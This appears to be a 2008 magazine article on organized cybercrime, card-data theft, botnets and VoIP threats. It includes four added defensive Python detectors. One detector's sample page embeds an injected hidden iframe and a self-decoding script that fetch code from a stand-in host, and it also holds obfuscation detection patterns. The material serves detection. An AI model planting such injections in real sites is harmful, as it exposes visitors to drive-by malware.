The New Era in Netcentric Security

Two young Miami men in their 20s, Albert “Segvec” Gonzalez and Damon Patrick Toey, began their scheme by “war driving,” or driving around looking to eavesdrop on wireless networks. With what they later recalled was surprisingly little difficulty, they were able to begin over the course of a few days to hack into the wireless networks of a slew of large retail businesses, including TJX, BJ’s Wholesale Club, OfficeMax, Boston Market, Barnes & Noble, Dave & Buster’s, Sports Authority, Forever 21 and DSW.
Once they gained access to the systems, they installed programs that captured card numbers as well as password and account information. They concealed the data on encrypted computer servers they shared with criminal collaborators in Eastern Europe and the United States. Some of the numbers they had stolen were quickly sold on the Internet to other data criminals around the world. Other card information they deemed particularly valuable they kept and “cashed out” by encoding the stolen numbers on the magnetic stripes of blank cards, which were then used to take tens of thousands of dollars out of automatic teller machines.
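The programs the gang planted were, in effect, sniffers for exactly the data a magnetic stripe carries. The following is an added example, not code from the article or from the case: a small scanner that looks through a captured byte stream for Track 2 records (what a swipe reader emits) and for bare card numbers, validating each candidate with the Luhn check so that arbitrary digit runs are not reported. The same logic is what a data-loss-prevention sensor runs on outbound traffic to catch this kind of exfiltration. The sample buffer is constructed, and the card numbers in it are published test numbers, not real cards.

```python
"""Added example, not from the article: scan a captured byte stream for
magnetic-stripe Track 2 records and bare card numbers, the kind of data
the sniffers described above were planted to collect.  Candidates are
validated with the Luhn check so that arbitrary digit runs are not
reported.  SAMPLE is constructed; the PANs are published test numbers."""
import re

# Track 2 as encoded on the stripe: ;PAN=YYMM<service code><discretionary>?
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{4})(\d*)\?")
# A bare PAN: 13-19 digits with no digit on either side
PAN_RE = re.compile(rb"(?<!\d)(\d{13,19})(?!\d)")

SAMPLE = (  # constructed capture fragment
    b"GET /x HTTP/1.1\r\n"
    b"log: swipe ;4111111111111111=49121010000000000000?\r\n"
    b"order_id=1234567890123 pan=5500000000000004 phone=0000000000000\r\n"
)


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check that every payment card number satisfies."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def plausible_pan(digits: str) -> bool:
    """Luhn passes and the run is not one repeated digit: a run of zeros
    satisfies Luhn, so it has to be rejected explicitly."""
    return len(set(digits)) > 1 and luhn_ok(digits)


def mask(pan: str) -> str:
    """Keep the first six and last four digits (the usual BIN + last-4 view)."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_card_data(buf: bytes) -> list:
    """Return (kind, masked PAN, byte offset, extra) for each hit."""
    hits, track2_pan_offsets = [], set()
    for m in TRACK2_RE.finditer(buf):
        pan, yymm = m.group(1).decode(), m.group(2).decode()
        if plausible_pan(pan):
            hits.append(("track2", mask(pan), m.start(),
                         {"exp": yymm[2:] + "/" + yymm[:2]}))
            track2_pan_offsets.add(m.start(1))
    for m in PAN_RE.finditer(buf):  # bare PANs not already seen inside a Track 2 record
        pan = m.group(1).decode()
        if m.start() not in track2_pan_offsets and plausible_pan(pan):
            hits.append(("pan", mask(pan), m.start(), {}))
    return hits


if __name__ == "__main__":
    for kind, pan, off, extra in find_card_data(SAMPLE):
        print(f"{kind:7} {pan} @{off} {extra}")
```

Run against the sample, the scanner reports the Track 2 record and the bare Mastercard test number, and stays quiet on the order ID (fails Luhn) and the all-zero phone field (passes Luhn, rejected as a repeated digit). Output is masked so the detector itself does not become another copy of the card data.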
By the time they were indicted on Aug. 5, 2008, by the US Department of Justice after a multi-year investigation by the US Secret Service, Gonzalez, Toey and their gang of other US citizens, an Estonian, three Ukrainians, two Chinese and a hacker in Belarus had stolen and sold or used millions of credit and debit card numbers.
Gonzalez, Toey and company represent the emerging face both of a new organized criminal epidemic and, perhaps more ominously, a new potentially highly destructive technological platform for wreaking disruption of the security of American citizens and institutions.
Although their case was called at the time of their indictment “the single largest and most complex identity theft case ever charged in this country” by Attorney General Michael Mukasey, their exploits, according to many cybersecurity experts, represent only the tip of the iceberg of the globally escalating phenomenon of cybercrime.
“Technology has obviously enhanced our lives and economy in many ways, but it’s also created serious new vulnerabilities,” William Pelgrin, director of Cybersecurity and Critical Infrastructure Coordination (CSCI) for the state of New York, told HSToday. “But as the extent, magnitude and costs of global cybercrime begin to sink in, it shows how simple strokes on a keyboard with a criminal purpose can have devastating results.”
No longer the strict preserve of isolated hackers, or cyberpunks, whose goal was primarily to show off to their peers by breaching the perimeters of networks or, at worst, launching malicious pranks, cyberattacks have become an increasingly organized criminal enterprise. The extent of their growing reach was documented in June 2007 in a Government Accountability Office (GAO) report titled CYBERCRIME: Public and Private Entities Face Challenges in Addressing Cyber Threats. The report concluded, “Cybercrime is a threat to US national economic and security interests. Based on various studies and expert opinion, GAO estimated the direct economic impact from cybercrime to be, conservatively, in the tens of billions of dollars.”
Cybercrime and national security
Increasingly, the boundaries between financially motivated cyber criminality, cyber-espionage and, possibly, cybercrime financing of terror organizations have become blurred.
In an investigative report published in April 2008, the magazine BusinessWeek described an e-mail aimed at defense consulting firm Booz Allen that was traced back to an Internet address in China and which, according to the report, “paints a vivid picture of the alarming new capabilities of America’s cyber enemies.”
The e-mail, which bore the subject line “Integrate US, Russian, and Indian weapons and avionics,” appeared to come from Stephen Moree, a civilian working for a group that reports to the office of the Air Force secretary and evaluates the sales of US military aircraft to other countries.
An analysis of the e-mail conducted for BusinessWeek by three cybersecurity specialists, however, found it was a fake sent by an unknown attacker, bounced through an Internet address in South Korea and relayed through a Yahoo server in New York. The analysis also showed the e-mail carried malicious software designed to log keystrokes on the computers of people who opened it, give the attacker control over the “host” computer, and capture screen shots and files that could, according to the report, be transmitted back to its “master” at an Internet address registered under a name housed with one of China’s largest free domain-name-registration and e-mail services.
China and Eastern Europe are hardly the only known source of cybercrime attacks.
In October 2008, The Wall Street Journal (Oct. 11, 2008) reported that European law enforcement officials, aided by US intelligence officials, had uncovered a data theft ring apparently designed to funnel account data to Pakistan from hundreds of credit and debit card machines across Europe, including those of huge retail chains such as a British unit of Wal-Mart Inc. and Tesco Ltd.
The scheme used untraceable devices, inserted into credit-card readers made in China, that sent account data over a wireless connection to computer servers in Lahore, Pakistan. Investigators found hundreds of rigged machines in at least five countries: Britain, Ireland, Belgium, the Netherlands and Denmark.
According to The Wall Street Journal account, US intelligence officials, including senior National Security Agency officials, are monitoring the case, in part because of its ties to Pakistan, which has become home to a resurgent Al Qaeda.
More pernicious malware
The technological underpinning of the evolution of organized criminality has been a new generation of increasingly pernicious technical innovations.
Cybercriminals traditionally have used viruses or bots to search for vulnerable computers where they can load their own programs or store data. A bot network is a collection of these infected machines, often compromised weeks or months earlier by attackers using worms or viruses to plant backdoor components that can be centrally controlled and used to launch simultaneous attacks.
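Because a bot has to be told what to do, a centrally controlled machine betrays itself by checking in with its controller on a timer. The following is an added example, not from the article or from any product, of the simplest network-side check for that behaviour: group outbound connections by source and destination and flag pairs whose inter-connection gaps and payload sizes barely vary. The flow log is constructed, and its format (epoch seconds, source, destination, bytes sent) is an assumption for the example.

```python
"""Added example, not from the article: flag hosts that contact the same
destination at a near-constant interval with near-constant payload sizes,
the timer-driven "check-in" of a bot under central control.  LOG is a
constructed flow log; its format (epoch seconds, source, destination,
bytes sent) is an assumption, not any product's output."""
import statistics
from collections import defaultdict

LOG = """\
1222800000 10.0.0.5 203.0.113.9 412
1222800060 10.0.0.5 203.0.113.9 418
1222800120 10.0.0.5 203.0.113.9 410
1222800181 10.0.0.5 203.0.113.9 415
1222800240 10.0.0.5 203.0.113.9 411
1222800301 10.0.0.5 203.0.113.9 419
1222800007 10.0.0.8 198.51.100.2 9120
1222800131 10.0.0.8 198.51.100.2 3011
1222800152 10.0.0.8 198.51.100.2 22034
1222800577 10.0.0.8 198.51.100.2 1500
1222800730 10.0.0.8 198.51.100.2 801
1222800842 10.0.0.8 198.51.100.2 4096
1222800900 10.0.0.9 203.0.113.9 500
"""


def parse_flows(log: str) -> dict:
    """Group (timestamp, bytes) per (src, dst) pair."""
    flows = defaultdict(list)
    for line in log.splitlines():
        ts, src, dst, size = line.split()
        flows[(src, dst)].append((int(ts), int(size)))
    return flows


def coeff_var(xs) -> float:
    """Population std-dev over mean: 0 means perfectly regular."""
    mean = statistics.mean(xs)
    return statistics.pstdev(xs) / mean if mean else 0.0


def beacon_score(events, min_events: int = 5):
    """(cv of inter-connection gap, cv of bytes) or None if too few events."""
    if len(events) < min_events:
        return None
    events = sorted(events)
    gaps = [b[0] - a[0] for a, b in zip(events, events[1:])]
    return coeff_var(gaps), coeff_var([e[1] for e in events])


def find_beacons(log: str, max_cv: float = 0.2) -> list:
    """(src, dst, gap_cv, size_cv) for every pair that looks timer-driven."""
    hits = []
    for (src, dst), events in parse_flows(log).items():
        score = beacon_score(events)
        if score and score[0] <= max_cv and score[1] <= max_cv:
            hits.append((src, dst, round(score[0], 3), round(score[1], 3)))
    return hits


if __name__ == "__main__":
    for hit in find_beacons(LOG):
        print("beacon candidate:", hit)
```

On the sample, only 10.0.0.5 is flagged: it talks to 203.0.113.9 every 60 seconds or so with a 410 to 420 byte request, while 10.0.0.8's bursty, variable-sized traffic to 198.51.100.2 looks like a person browsing. In practice bots add random jitter and sleep for hours, so the threshold has to be loosened, known-good periodic destinations (time servers, update services) excluded, and a minimum observation span required before an alert is raised.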
Increasingly, according to Mike Carpenter, senior vice president of Public Sector solutions for online security solutions developer McAfee, Santa Clara, Calif., “spammers, hackers, and other cybercriminals are acquiring or renting bot networks, making it harder for authorities to track down the real culprits.”
While these threats have been around for several years, Carpenter added, what’s really new is the increasing sophistication and refinement that malware writers are adding to their tools and attack techniques.
“Earlier attackers used to deface websites after they hacked them, usually leaving a note on the site in the hope of becoming famous,” Carpenter told HSToday. “That’s no longer the case. Hackers are now spreading malware by first compromising popular websites, stealthily planting malware and luring users via social engineering tricks.”
This malware allows the adversary to gain full control of the compromised systems, leading to the exfiltration of sensitive information or installation of utilities that facilitate remote control of the host.
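The injection Carpenter describes usually leaves a small, recognisable footprint in the compromised site's HTML: an iframe sized to zero or hidden by style that loads the exploit from another host, or an inline script that decodes itself with unescape() before writing the real loader. The following is an added example, not from the article or from any vendor, of a scanner that flags those two patterns in a fetched page. The page is constructed; example.com and the 203.0.113.x addresses are documentation ranges, not real sites.

```python
"""Added example, not from the article: scan a page's HTML for the
injection patterns used to turn a compromised legitimate site into a
drive-by download host: invisible iframes that pull content from another
host, and inline scripts that unpack themselves with unescape()/eval().
PAGE is constructed; example.com and the 203.0.113.0/24 addresses are
documentation ranges, not real attacker infrastructure."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Self-decoding script bodies: eval(unescape(...)), document.write(unescape(...)),
# or raw %uXXXX escapes (typical of embedded shellcode).
OBFUSCATED_RE = re.compile(
    r"(?:eval|document\.write)\s*\(\s*unescape\s*\(|%u[0-9a-fA-F]{4}")

PAGE = """<html><body>
<h1>Store front</h1>
<script src="/js/menu.js"></script>
<iframe src="http://www.example.com/help" width="300" height="200"></iframe>
<iframe src="http://203.0.113.7/in.cgi?3" width="0" height="0" style="display: none"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A//203.0.113.7/x.js%22%3E%3C/script%3E'));</script>
</body></html>"""


class InjectionScanner(HTMLParser):
    """Collect (kind, evidence) findings while the page is parsed."""

    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = a.get("src") or ""
            host = urlparse(src).hostname or self.site_host  # relative src = same host
            style = (a.get("style") or "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            hidden = "display:none" in style or "visibility:hidden" in style
            if (tiny or hidden) and host != self.site_host:
                self.findings.append(("hidden_iframe", src))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands the body of a <script> element to handle_data unparsed.
        if self._in_script and OBFUSCATED_RE.search(data):
            self.findings.append(("obfuscated_script", data.strip()[:60]))


def scan(html: str, site_host: str) -> list:
    """Parse one page and return its findings."""
    p = InjectionScanner(site_host)
    p.feed(html)
    p.close()
    return p.findings


if __name__ == "__main__":
    for kind, evidence in scan(PAGE, "www.example.com"):
        print(f"{kind}: {evidence}")
```

The legitimate help iframe (same host, normal size) is left alone; the zero-sized off-site iframe and the self-decoding script are reported. This is a cheap first pass for a site owner checking their own pages after a compromise; it will not catch injected content that is served only to some visitors, which is why comparing the page as fetched from outside with the copy on disk is the more reliable check.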
“The development of Web-based malware has marked a tipping point,” Phyllis Schneck, vice-president of research integration for Secure Computing, San Jose, Calif., said to HSToday. “It has allowed attackers to get far more targeted in going after highly specific kinds of information.”
According to the ScanSafe Global Threat Report released in September 2008 (available with registration through http://www.scansafe.com) by San Francisco, Calif.-based ScanSafe, a provider of web security software, the volume of malware blocks increased by 338 percent in the third quarter of 2008 compared with the first quarter.
“What surprised and concerned me most about the report,” said Mary Landesman, senior security researcher at ScanSafe and author of the report, “is that we’re seeing a dramatic increase in concentrated malware exposure within four key verticals: chemical, energy, pharmaceutical and engineering sites. Now, in theory, sites with the most browsing traffic, consumer-facing sites, should have the most malware. But this is an indication. Though the data remains inconclusive, it supports the notion that malware attacks are becoming far less randomized, far less just catch-as-catch-can theft of financial data or identity.”
Getting ahead of the curve
Combating cybercrime is a multi-dimensional challenge encompassing technological, educational and legal components.
“The security industry must provide technology solutions that stay one step ahead of the threats,” said Carpenter. “This requires constant effort. The quality of software needs to improve. It used to be that attacks were focused on the operating system level but the target has now moved to the application layer, which has not had nearly enough security focus.”
One way McAfee Inc. has attempted to redefine how computers are protected against viruses, worms, Trojan horses and other malicious programs is a new Internet-based service hosted by McAfee Avert Labs that provides protection on the fly when a computer encounters malicious code. Named Artemis, it is billed by McAfee as the industry’s first technology to shield computer users against attacks as they happen without requiring a traditional, scheduled update of threat signatures to be installed on the machine.
“When you have malware threats beginning to scale into several hundred new ones every single day and growing rapidly, the old paradigm of needing to create and install a new patch once each new malware signature is discovered becomes a losing proposition,” Carpenter related. “Even the best financed IT systems in the largest enterprises in the world can’t be loading 120,000 new versions of protective software per year.”
As important as technology is in securing cyberspace, education and communication, Schneck believes, are equally important. “One interesting thing,” she said, “is that the bad guys so far have been far better at sharing information to evolve ever more sophisticated ways of probing and attacking network vulnerabilities than the good guys. The good guys have been playing catch-up and, despite some progress, still mostly are behind the curve, frankly.”
To address this need, a number of vendors, industry and non-profit groups have launched educational initiatives.
One such effort is McAfee’s soon to be launched Cybercrime Response Unit (CRU), which will help consumers and businesses that believe they have become the victim of cybercrime to report the incident and secure their credit. The unit will provide help assessing the situation, including advice on what evidence to gather for law enforcement to bring a case, and refer victims to the appropriate law enforcement agencies, credit agencies, support agencies and other organizations.
“Awareness needs to be raised that cybercrime is not a victimless crime,” said Carpenter. “Oftentimes, perpetrators think of cybercrime as easy money or as a crime without impact on another person’s life—far from the case. Would-be cybercriminals need to understand that they do risk getting caught and that cybercrime is as serious as brick-and-mortar crime—crimes with a ‘face.’ Law enforcement wants to do the right thing, but as this is such a new area for the legal system, there needs to be far more visibility into the real costs, human and financial, of cybercrime.”
The federal government has also launched the Internet Crime Complaint Center (IC3), a partnership of the Federal Bureau of Investigation, the National White Collar Crime Center and the Bureau of Justice Assistance. It is a vehicle to receive, develop and refer criminal complaints regarding the rapidly expanding arena of cybercrime. “The IC3 gives the victims of cybercrime a convenient and easy-to-use reporting mechanism that alerts authorities of suspected criminal or civil violations,” Carpenter said.
The most ambitious federal project, announced last spring but still largely classified, is the National Strategy to Secure Cyberspace (NSSC). Headed by the Department of Homeland Security (DHS), the NSSC has three stated strategic objectives: to prevent cyber attacks against America’s critical infrastructures, to reduce national vulnerability to cyber attacks, and to minimize damage and recovery time from cyber attacks that do occur.
As explained by DHS Deputy Secretary Paul Schneider in a speech in September, “DHS has the lead responsibility to protect the federal civilian domains and networks, which basically means anything with a dot-gov address. The Department of Defense has made great strides in the strengthening and the protection of their networks and the dot-mil environment. So we are leading the charge to do the same for dot-gov.”
The Multi-State Information Sharing and Analysis Center (MS-ISAC), Albany, NY, a collaborative organization with participation from all 50 states, the District of Columbia, local governments and US territories, is designed to provide a common mechanism for raising the level of cybersecurity readiness and response in each state and with local governments.
An example of how this collaboration works, Pelgrin, the cybersecurity chief who founded and chairs the organization, told HSToday, is an alert map application that the group developed.
“This is a map of the nation,” Pelgrin explained, “in which each state displays its current cybersecurity alert level, along with contact information for the Multi-State ISAC members, who have adopted this common Cyber Alert Indicator Protocol process; thus, when any Multi-State ISAC member state is at a ‘Guarded’ level for cyber, for example, all of the other Multi-State ISAC members will know the specific criteria used to arrive at that level.”
Multi-State ISAC has also established a shared 24/7 incident management system that provides cybersecurity monitoring for, and analysis of, intrusions and other anomalous cyber activity for New York State agencies and public universities, as well as the members of the Multi-State ISAC.
“Reporting incidents to a central group promotes collaboration and information sharing with other sites that may be experiencing similar problems,” Pelgrin said.
The global nature of cybercrime makes arresting and prosecuting cybercriminals difficult. As Carpenter explained, “Without a globally coordinated law enforcement effort, you might be able to track down a criminal group to a particular foreign location, hand off the case and then find it can’t be prosecuted. Currently, the legal frameworks that apply across borders to address emerging threats are not functioning well, oftentimes hobbling investigations.”
A key example of the type of global collaboration necessary, Carpenter said, is the Council of Europe’s Convention on Cybercrime, the first international treaty on crimes committed via computer networks, which he described as a prototype of the kind of global law enforcement approach needed. The convention’s mandate is to pursue a common criminal policy aimed at protecting society against cybercrime, especially by adopting appropriate legislation and fostering international cooperation. The convention is the product of four years of work by Council of Europe experts, together with the United States, Canada, Japan and other countries that are not members of the organization.
Emerging threats: mobile and VoIP
Cybercrime is a constantly morphing threat and fighting it is a never-ending battle. In its look ahead to the cyberthreat landscape, titled Emerging Cyber Threats Report for 2009 and published in October 2008, researchers at the Georgia Tech Information Security Center (GTISC), Atlanta, Ga., cited wireless and voice over Internet protocol (VoIP) as two areas where network security remains well behind the curve of rising cybercrime.
Focusing on mobile phones, the report quotes Dave Amster, vice president of security investigations for Equifax, an Atlanta, Ga.-based financial data and information technology company, as saying, “More and more financial transactions will take place over mobile devices. Consumers are ordering credit reports from their BlackBerrys, which puts valuable information at risk.”
The forward challenge for businesses and banks, according to Amster, “is going to be maintaining secure mobile applications and ease of use at the same time.”
Patrick Traynor, an assistant professor in the School of Computer Science at Georgia Tech and a member of GTISC, predicted that as smart phones such as the iPhone store more personal identity, payment card information and other data, they will be targeted by malware, which will be injected onto cell phones to turn them into bots, which could then be combined into botnets that could perpetrate denial-of-service attacks against the core of the cellular network. At this point, even rudimentary security systems are lacking on many wireless data networks.
Another key vulnerability is VoIP telephony: “As Internet telephony and mobile computing handle more and more data, they will become more frequent targets of cybercrime. Once you begin, as many Fortune 1000 companies are already doing, to transmit voice calls digitally, they become susceptible to the same kinds of attacks that occur on any digital network: data theft, denial-of-service, remote code execution and botnets.”
An example of the kind of critical network data potentially exposed over IP is the nation’s 911 emergency call system.
“A big evolution occurring in the 911 industry, from traditional 911 to Next Generation 911,” Jeremy Smith, technical solutions engineer at Temecula, Calif.-based PlantCML, told HSToday, “serves both the public safety and private security sectors. It’s dramatic, and everyone’s scrambling to make sure they’re secure in this new way of doing things.”
The new way of doing things is by IP. Where traditionally, Smith explained, 911 was a TDM or telephony-based system with a physical PBX [private branch exchange], it’s now moving toward a purely IP model with [VoIP].
“911 systems are prime targets for hackers,” said Smith. “But in most cases, 911 centers have never been connected to the Internet or other networks, and hackers targeting the systems had to have actual physical access to the target to do their phone phreaking. So in the past, the overhead associated with 911 hacking has been high and a good deterrent. However, next generation 911 interconnects call centers with IP, giving attackers a much lower barrier to entry. So now the risk of hacking will go up, because the overhead associated with that hacking is so much less.”
Besides spam, other VoIP-related threats, such as viruses and other types of malware, will become a major issue, he predicted: “We may not be dealing a lot today with inbound and outbound Internet threats, but in the next generation of 911, we will.”
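Once a 911 center takes calls over IP, the signalling itself becomes the attack surface, and the first controls a session border controller in front of the center applies are rate-based checks on SIP requests. The following is an added example, not from the article, from PlantCML or from any product: a minimal SIP request parser and two such checks, one for an INVITE flood from a single source (tying up call-takers, the denial-of-service case Smith raises) and one for a REGISTER sweep that walks extension numbers (reconnaissance before spoofed or fraudulent calls). The capture, the addresses, the psap.example domain and the thresholds are constructed assumptions.

```python
"""Added example, not from the article: a small SIP request parser and two
rate-based checks a session border controller in front of an IP-connected
911 centre could apply: an INVITE flood from one source (call-taker
denial of service) and a REGISTER sweep that walks extension numbers
(reconnaissance before toll fraud or spoofed calls).  The capture,
addresses and thresholds are constructed assumptions."""
from collections import defaultdict


def parse_request(raw: str):
    """Return (method, request-URI, {header: value}) or None if not a SIP request."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("SIP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers


def detect(capture, window=10.0, invite_limit=20, sweep_limit=10) -> list:
    """capture: iterable of (timestamp, source IP, raw SIP message), in time order."""
    invites = defaultdict(list)   # src -> INVITE timestamps inside the window
    probed = defaultdict(set)     # src -> distinct URIs registered/probed
    alerts = []
    for ts, src, raw in capture:
        req = parse_request(raw)
        if req is None:
            continue
        method, uri, _hdrs = req
        if method == "INVITE":
            recent = invites[src]
            recent.append(ts)
            while recent[0] < ts - window:      # slide the window forward
                recent.pop(0)
            if len(recent) == invite_limit:     # fire once, when the limit is crossed
                alerts.append(("invite_flood", src))
        elif method in ("REGISTER", "OPTIONS"):
            probed[src].add(uri)
            if len(probed[src]) == sweep_limit:
                alerts.append(("extension_sweep", src))
    return alerts


def sip(method, uri, src, call_id):
    """Build a minimal SIP request (constructed test traffic)."""
    return (f"{method} {uri} SIP/2.0\r\n"
            f"Via: SIP/2.0/UDP {src}:5060;branch=z9hG4bK{call_id}\r\n"
            f"From: <sip:caller@{src}>;tag=1\r\nTo: <{uri}>\r\n"
            f"Call-ID: {call_id}@{src}\r\nCSeq: 1 {method}\r\n\r\n")


# Constructed capture: three normal calls, a 25-INVITE burst in 5 s, a 12-extension sweep.
CAPTURE = []
for i in range(3):
    CAPTURE.append((100 + 30 * i, "10.1.1.20",
                    sip("INVITE", "sip:911@psap.example", "10.1.1.20", f"ok{i}")))
for i in range(25):
    CAPTURE.append((200 + 0.2 * i, "198.51.100.50",
                    sip("INVITE", "sip:911@psap.example", "198.51.100.50", f"fl{i}")))
for i in range(12):
    CAPTURE.append((300 + i, "203.0.113.99",
                    sip("REGISTER", f"sip:{1000 + i}@psap.example", "203.0.113.99", f"sw{i}")))
CAPTURE.sort(key=lambda e: e[0])

if __name__ == "__main__":
    for kind, src in detect(CAPTURE):
        print(f"{kind} from {src}")
```

The three genuine calls from 10.1.1.20 never approach the limit; the burst from 198.51.100.50 trips the flood alert on its twentieth INVITE, and the REGISTER sweep is reported once it has touched ten different extensions. Keying on source IP is only a starting point: a real flood is spread across many sources, so a production control also rates by Call-ID churn, by target URI, and by whether the caller ever completes the INVITE handshake.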
When faced with a growing threat, there are two common responses. One is to ignore, minimize or wholly deny the threat. The other is to inflate the threat beyond the concrete facts. Both of these tactics, in the words of William Pelgrin, have a similar result—“the victory of paralysis over proactivity.”
In their stead, he urged that far closer relationships be forged among the public, policy makers and security professionals.
“None of us is as smart as all of us,” he said. “Therefore, collaboration, cooperation and communication need to be the cornerstones of a viable approach. No one community, whether it’s corporations, government, technologists or law enforcement, can do this alone.” HST


The Government Technology & Services Coalition's Homeland Security Today (HSToday) is the premier news and information resource for the homeland security community, dedicated to elevating the discussions and insights that can support a safe and secure nation. A non-profit magazine and media platform, HSToday provides readers with the whole story, placing facts and comments in context to inform debate and drive realistic solutions to some of the nation’s most vexing security challenges.
